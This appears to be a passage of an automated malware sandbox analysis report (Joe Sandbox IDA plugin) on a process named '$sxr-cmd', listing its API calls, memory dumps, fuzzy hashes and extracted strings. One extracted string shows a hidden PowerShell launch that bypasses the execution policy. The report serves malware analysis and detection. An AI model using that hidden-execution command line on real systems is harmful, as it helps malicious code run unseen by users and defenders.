                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF61551EFDC
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFED
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F003
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F022
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F083
                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F092
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F0A5
                                                                                                                      • towupper.MSVCRT ref: 00007FF61551F0DB
                                                                                                                      • wcschr.MSVCRT ref: 00007FF61551F135
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F16C
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F185
                                                                                                                        • Part of subcall function 00007FF6155001B8: _get_osfhandle.MSVCRT ref: 00007FF6155001C4
                                                                                                                        • Part of subcall function 00007FF6155001B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                                                      • API String ID: 1161012917-1690691951
                                                                                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                      • Instruction ID: fa0cfaae1f7a6541d3cc6a64863540525ffd1c5a1ceab882eba4ce5225492382
                                                                                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                      • Instruction Fuzzy Hash: FA917D2AB09E528AFB149B74E8501BDBAB0AF49F64F494135DD1E826B5EF3CAC458310
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154F32F3
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014,?,?,0000002F,00007FF6154F32A4), ref: 00007FF6154F3309
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6154F3384
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6155111DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 611521582-0
                                                                                                                      • Opcode ID: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                                      • Instruction ID: cb19ea0827d5e2c7d343c0f2181014f36188174ed9a82c458a9d72d2ea3f89f7
                                                                                                                      • Opcode Fuzzy Hash: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                                      • Instruction Fuzzy Hash: 52A16026B08E12CAEB148B69A8442BDFBA1FB49F65F455135CD0EC67A5DF3CAC45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                      • String ID: \\?\
                                                                                                                      • API String ID: 628682198-4282027825
                                                                                                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                      • Instruction ID: 853d749fe8e60687e22ce65127e84a8954a5f98150664ed2b0336c59c9dd876c
                                                                                                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                      • Instruction Fuzzy Hash: 19E18136B08A8296EB649B28D9502F9B7A0FB45F69F405136D90EC77E4EF3CE955C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF61550C9F1
                                                                                                                      • GOTO, xrefs: 00007FF6154FD0A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                      • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX$GOTO
                                                                                                                      • API String ID: 3863671652-3149232499
                                                                                                                      • Opcode ID: 0ae25ffffae42cbeff07b69f34e00ae9c076a34045a6fc06e9c4354b30aa6740
                                                                                                                      • Instruction ID: a4b276466259d09d61d6b8eed9b829b80bd3fe23192a6da52d5bb97216b9c645
                                                                                                                      • Opcode Fuzzy Hash: 0ae25ffffae42cbeff07b69f34e00ae9c076a34045a6fc06e9c4354b30aa6740
                                                                                                                      • Instruction Fuzzy Hash: 06E1BB29A0DE4286FAA49B2DE4543B9E7A0AF46F74F554136C95EC62F1DF3CEC458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                      • String ID: $Application$System
                                                                                                                      • API String ID: 3538039442-1881496484
                                                                                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                      • Instruction ID: e8a5b2f733b7a41be084e0ac652e4b08bf95ddf8339879dcc82f7bf4e31aa5d9
                                                                                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                      • Instruction Fuzzy Hash: 81519A3AA09F41D6EB208B29B44067AFAA1FB89F64F459135DE4E877A4DF3CD845C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                      • String ID: COPYCMD$\
                                                                                                                      • API String ID: 3989487059-1802776761
                                                                                                                      • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                      • Instruction ID: 81e0ca4bec371da2c34eec566ff28fabccb0fd6e606598ee9012d9ed22bd20dc
                                                                                                                      • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                      • Instruction Fuzzy Hash: 00F1C369A08F4682EA549F19D4542BAB7A0FF45FA8F048036CA4E877B5EF3CE855C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                      • API String ID: 55602301-2548490036
                                                                                                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                      • Instruction ID: 52bfda52bb643abdd0206781102a4429f37e9df4be48bb5a21e24c9ab25d37c7
                                                                                                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                      • Instruction Fuzzy Hash: 1FA1843AA18E42D6EB108B10E4402BAF7A5FB44F68F500136DA5EC76B4EF3CE945D700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3935429995-0
                                                                                                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                      • Instruction ID: 7b475f3706f6e233e3a5abf2e08e9966055b98a73a14fa2803b116421adf2063
                                                                                                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                      • Instruction Fuzzy Hash: 80618E3EA18A92C6E7149F21A40457AFBA4FF89FA4F098135DE4A837A4DF3CD8418740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                      • Instruction ID: 5e9f11c1c03cf58f6135ad639900d65e4e1d53faf3dbcc55d84df31b81558022
                                                                                                                      • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                      • Instruction Fuzzy Hash: 3091A236A09A82C6EB649F29D8502F9BBB0FB49F65F014135DA4E877A4DF3CD945C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                                                      • String ID: DPATH
                                                                                                                      • API String ID: 3260997497-2010427443
                                                                                                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                      • Instruction ID: 8b151dca0669e9d1261c1120e7fa35e3c34eab85822232cc3b431b0ac561c333
                                                                                                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                      • Instruction Fuzzy Hash: FDD17C26A08E4286EA249B69D8401BDA3A1FF46FA8F154232DA1DC77E5DF3CEC51C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                      • String ID: @P
                                                                                                                      • API String ID: 1801357106-3670739982
                                                                                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                      • Instruction ID: 39ad097056c994e282cac2004f08e94cf9e81b0d372a444838f7e9cf60b84ce5
                                                                                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                      • Instruction Fuzzy Hash: 38415B36B04E41DBE7108F74D4802EDABB0FB89F68F458231DA5D96AA8DF78D908C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1034426908-0
                                                                                                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                      • Instruction ID: da1c1c74531807f29951303029a1aed7f416ac4c1405cc7eab86d9a24cb1b8af
                                                                                                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                      • Instruction Fuzzy Hash: 6DF19136B08F828AEB64DF29D8402E9A7A1FF45F68F444136DA5D876A5DF3CE914C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                      • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction ID: 5086237b56690572924cc89aed7993011369da195066a61195b412f75d98dd2f
                                                                                                                      • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction Fuzzy Hash: A9B1D46221AB9086FB588FA5D5187A973B6F740FA4F845016DE4D5BB96FF3ACC40C340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
